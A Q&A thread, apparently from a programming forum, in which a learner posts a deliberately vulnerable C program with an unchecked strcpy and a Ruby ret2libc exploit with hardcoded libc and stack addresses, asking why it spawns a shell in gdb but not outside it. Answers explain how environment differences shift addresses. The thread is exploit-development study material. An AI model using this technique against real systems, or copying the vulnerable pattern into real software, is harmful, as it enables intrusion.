# Ret2libc exploit works in gdb, but in normal shell gives error sh: 1: g:0:1: not found

Tags: c, buffer-overflow, exploit

I am learning about ret2libc buffer overflow exploits to bypass NX.

My vulnerable code (vuln.c):

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    if (argc != 2)
        printf("NO\n");
    else {
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
}
```

Compiled with this command: `# gcc -o vuln vuln.c`

I then created this simple ret2libc exploit in ruby (exploit.rb):

```
p = "A"*524
p += [0xb7e9ef10].pack('<I') # system()
p += [0xb7e79e46].pack('<I') # nomal ret val
p += [0xbffff75a].pack('<I') # "/bin/bash"
print(p)
```

If it run it in gdb with `(gdb) r $(ruby exploit.rb)` it gives me a nice bash shell.

I then try to run it in a normal shell with `# ./vuln $(ruby exploit.rb)`, but instead of giving me a shell it gives me this instead: `sh: 1: g:0:1: not found`

ASLR is disabled and the only protection enabled is NX, I think.

Any help is appreciated.

**Edit:**

I am running this on i686 in case that helps.

Answer (score 2, accepted):

The reason for shifting is the execution environment.

```
user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70
```

Here the way of launching **getenv** is affecting address of the **PWN**.

Answer (score 0):

You achieved code execution but the address of the `SHELL env var` is off. Try `[address of shell in gdb] + 4`, or in `gdb, x/s 0xbffff75a+4.`

Comment: I had already added 4 to this value. When running in the shell (not in gdb) does the address shift for some reason.